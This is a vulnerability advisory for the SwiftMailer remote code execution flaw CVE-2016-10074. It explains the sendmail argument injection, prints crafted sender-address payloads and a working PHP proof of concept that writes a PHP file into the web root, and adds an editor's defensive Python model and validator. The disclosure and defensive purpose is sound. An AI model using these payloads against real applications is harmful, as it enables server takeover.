=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- CVE-2016-10074
- Release date: 28.12.2016
- Revision 1.0
- Severity: Critical
=============================================

I. VULNERABILITY
-------------------------

SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)

II. BACKGROUND
-------------------------

"Swift Mailer is a component-based library for sending e-mails from PHP applications."

"Swift Mailer began back in 2005 as a one-class project for sending mail over SMTP. It has since grown into the flexible component-based library that is in development today."

The SwiftMailer library is used by major PHP projects, including some of the most popular PHP frameworks such as Yii2, Laravel and Symfony.

https://github.com/swiftmailer/swiftmailer/blob/5.x/doc/introduction.rst
https://github.com/swiftmailer/swiftmailer/blob/5.x/doc/overview.rst

Symfony / Yii / Laravel frameworks:
http://symfony.com/doc/current/email.html
https://github.com/yiisoft/yii2-swiftmailer
https://laravel.com/docs/5.1/mail

III. INTRODUCTION
-------------------------

Independent research uncovered a critical vulnerability in SwiftMailer that could potentially be used by (unauthenticated) remote attackers to achieve arbitrary code execution in the context of the web server user and remotely compromise the target web application.

To exploit the vulnerability an attacker could target common website components such as contact/feedback forms, registration forms, password reset e-mails and others that send out e-mail with the help of a vulnerable version of the SwiftMailer library.
Despite significant efforts to responsibly disclose the vulnerability to the vendor, it remains unfixed as of 28 December.

Note: This advisory is limited. Remaining attack vectors/exploits will be disclosed at a later date to allow more time for patching.

IV. DESCRIPTION
-------------------------

SwiftMailer uses the PHP mail() function as its default transport (Swift_MailTransport). SwiftMailer suffers from the same vulnerability as the one disclosed in PHPMailer:

http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

The transport takes the message's reverse path (the Sender address, or the first From address when no Sender/Return-Path is set) and passes it to mail() as the additional_parameters argument, formatted as -f<address>. PHP's mail() runs that string through escapeshellcmd() and appends it to the configured sendmail_path, and the resulting command line is executed through the shell. escapeshellcmd() backslash-escapes a fixed set of shell metacharacters, but it leaves whitespace alone and escapes a double quote only when it has no matching partner, so an address with a quoted local part reaches the shell largely intact.

The following Sender address:

"Attacker -Param2 -Param3"@test.com

would cause SwiftMailer/mail() to execute /usr/sbin/sendmail with the following list of arguments:

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fAttacker -Param2 -Param3@test.com]

which would not work for the attacker (Param2 and Param3 are passed within the same argument, argv[3]).

Attackers can however break out of parameter no. 3 with some extra escaping. For example, by injecting a \" sequence after the first parameter, the following Sender address:

"Attacker \" -Param2 -Param3"@test.com

when passed to SwiftMailer (and eventually to mail()) would cause sendmail to execute with:

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fAttacker \]
Arg no. 4 == [-Param2]
Arg no. 5 == [-Param3"@test.com]

As can be seen, this injects the additional parameters 4 and 5 into the sendmail command line. The first two double quotes form a pair, so escapeshellcmd() leaves them alone; the backslash is escaped to \\, which the shell turns back into a literal backslash inside the quoted word; the second quote then closes the word, and the unpaired third quote is escaped to \" and survives as a literal character in the last argument. Attackers can exploit this to achieve code execution as shown in the PoC below.

V. PROOF OF CONCEPT EXPLOIT
-------------------------

<?php
/*
 * SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074) PoC
 * See the full advisory URL for the exploit details.
 */
// Attacker's input coming from an untrusted source such as $_GET, $_POST etc.
// For example from a contact form with a sender field.
// -oQ changes sendmail's queue directory and -X writes a transcript of the
// transaction (including the message) to the given file.
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';

// ------------------
// mail() param injection via the vulnerability in SwiftMailer

require_once 'lib/swift_required.php';

// Mail transport (wraps PHP's mail(), which hands the sender to sendmail through the shell)
$transport = Swift_MailTransport::newInstance();

// Create the Mailer using your created Transport
$mailer = Swift_Mailer::newInstance($transport);

// Create a message; the From address becomes the reverse path passed as -f<address>
$message = Swift_Message::newInstance('Swift PoC exploit')
  ->setFrom(array($email_from => 'PoC Exploit Payload'))
  ->setTo(array('receiver@domain.org', 'other@domain.org' => 'A name'))
  ->setBody('Here is the message itself')
  ;

// Send the message with the PoC payload in the 'From' field
$result = $mailer->send($message);

~~~~~~~~~~~

The researcher also developed an unauthenticated RCE exploit for a popular open-source application (deployed on the Internet on more than a million servers) as a PoC for real-world exploitation. It might be published after the vendor has fixed the vulnerabilities.

Video PoC:
~~~~~~~~~~~~~
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html

VI. BUSINESS IMPACT
-------------------------

Successful exploitation could let remote attackers gain access to the target server in the context of the web server account, which could lead to a full compromise of the web application.

VII. SYSTEMS AFFECTED
-------------------------

All versions of SwiftMailer, including the latest 5.4.5-DEV, are affected.

VIII. SOLUTION / VENDOR RESPONSE
-------------------------

The vulnerability was responsibly disclosed to the SwiftMailer vendor. The first contact attempts started on the 2nd of December. Unfortunately the vendor has not fixed the SwiftMailer library to date and it remains vulnerable. Because of this, users of SwiftMailer (which includes the various frameworks that make use of the library) remain at risk.

Until a fixed release is available, applications using Swift_MailTransport should not put a user-supplied address into the envelope sender (setFrom(), setSender() or setReturnPath()); send from a fixed, trusted address and carry the user's address in Reply-To instead, or reject any address whose local part is not a plain dot-atom (no whitespace, quotes or backslashes). Using an SMTP transport rather than mail() avoids the sendmail command line altogether.
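The following is an added example and is not part of the original advisory or of SwiftMailer itself. It models the path from a SwiftMailer reverse path to the argv that sendmail receives: PHP's escapeshellcmd() is re-implemented in Python from the algorithm PHP documents (fixed metacharacters always escaped, quotes escaped only when unpaired), Python's shlex in POSIX mode stands in for /bin/sh, and the PHP default sendmail_path of /usr/sbin/sendmail -t -i together with Swift_MailTransport's -f%s parameter template are assumed. It reproduces the argument lists from section IV and adds a strict envelope-sender check that an application can apply itself while the library is unpatched. The function names and the constructed addresses are the editor's.

```python
"""Model of how PHP's mail() hands a SwiftMailer reverse path to sendmail.

Editor's example, not SwiftMailer or PHP code. mail() passes its
additional_parameters string through escapeshellcmd(), then runs
"<sendmail_path> <escaped params>" via popen(), i.e. through /bin/sh.
shlex (POSIX mode) is used here in place of /bin/sh.
"""
import re
import shlex

# Characters escapeshellcmd() always prefixes with a backslash. Single and
# double quotes are handled separately: they are escaped only when unpaired.
_ALWAYS_ESCAPED = set('#&;`|*?~<>^()[]{}$\\\n\xff')

# Assumptions: PHP's default sendmail_path and Swift_MailTransport's
# "-f%s" extra-parameter template.
SENDMAIL_PATH = '/usr/sbin/sendmail -t -i'
EXTRA_PARAMS_TEMPLATE = '-f%s'


def php_escapeshellcmd(cmd: str) -> str:
    """Re-implementation of PHP's escapeshellcmd() quoting rules."""
    out = []
    pending_close = None  # index of the quote that closes the currently open pair
    for i, ch in enumerate(cmd):
        if ch in '"\'':
            if pending_close is None:
                j = cmd.find(ch, i + 1)
                if j != -1:
                    pending_close = j      # paired quote: both left unescaped
                else:
                    out.append('\\')       # unpaired quote: escaped
            elif pending_close == i:
                pending_close = None       # closing quote of the pair
            else:
                out.append('\\')           # the other quote kind inside a pair
        elif ch in _ALWAYS_ESCAPED:
            out.append('\\')
        out.append(ch)
    return ''.join(out)


def sendmail_argv(reverse_path: str) -> list:
    """argv sendmail receives for a given envelope sender.

    Swift_MailTransport builds '-f<reverse_path>', mail() escapes it with
    escapeshellcmd() and popen()s sendmail_path + ' ' + escaped; the shell
    then splits that command line into words.
    """
    extra = EXTRA_PARAMS_TEMPLATE % reverse_path
    command_line = SENDMAIL_PATH + ' ' + php_escapeshellcmd(extra)
    return shlex.split(command_line, posix=True)


def injected_options(reverse_path: str) -> list:
    """Sendmail options an address smuggles in (empty when it is harmless)."""
    argv = sendmail_argv(reverse_path)
    base = shlex.split(SENDMAIL_PATH)
    return argv[len(base) + 1:]            # everything beyond the single -f word


# Deliberately stricter than RFC 5322: a dot-atom-like local part and a
# hostname-like domain. Quoted local parts, whitespace and backslashes are
# exactly what the injection relies on, so none of them are accepted.
_SAFE_ADDRESS = re.compile(r'^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$')


def is_safe_envelope_sender(address: str) -> bool:
    """True only for addresses that cannot add arguments to the sendmail call."""
    return bool(_SAFE_ADDRESS.match(address))


if __name__ == '__main__':
    # Constructed inputs: a benign address and the two addresses from section IV.
    for addr in ('user@example.com',
                 '"Attacker -Param2 -Param3"@test.com',
                 '"Attacker \\" -Param2 -Param3"@test.com'):
        print(repr(addr))
        print('  safe sender:', is_safe_envelope_sender(addr))
        print('  sendmail argv:', sendmail_argv(addr))
        print('  injected:', injected_options(addr))
```

Run it to see the first injection attempt collapse into a single -f word while the \" variant yields separate -Param2 and -Param3 words. The check rejects both attempts on syntax alone; it does not try to be clever about which sendmail options are dangerous, since any extra word on that command line is already a bug.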
The vendor was advised by the researcher of the upcoming exploit for another library (PHPMailer) which, when published along with the new release, would make it possible for malicious users to "connect the dots" and use the same payloads to attack SwiftMailer users.

The last attempt at contact (resending the tested PoC exploit) was made on Dec 26th, to which the vendor has not replied.

As, after the publication of the PHPMailer exploit, other users did start to see the similarities and file public vulnerability reports, there is no more point in keeping this advisory private.

MITRE assigned the following CVE ID to this vulnerability upon the request made by the researcher: CVE-2016-10074

IX. REFERENCES
-------------------------

https://legalhackers.com

This (CVE-2016-10074) advisory:
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

Video PoC:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html

Exploit code:
The simple PoC shown above is available here:
https://legalhackers.com/exploits/CVE-2016-10074/SwiftMailer_PoC_RCE_Exploit.txt

Other exploits with other attack vectors will be disclosed at a later date to allow more time for patching.

CVE-2016-10074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10074

SwiftMailer github
https://github.com/swiftmailer/swiftmailer

X. CREDITS
-------------------------

The vulnerability was discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
https://legalhackers.com

Thanks to SecuriTeam for help with disclosing the vulnerability to the vendor.

XI. REVISION HISTORY
-------------------------

28.12.2016 - Limited advisory released

XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.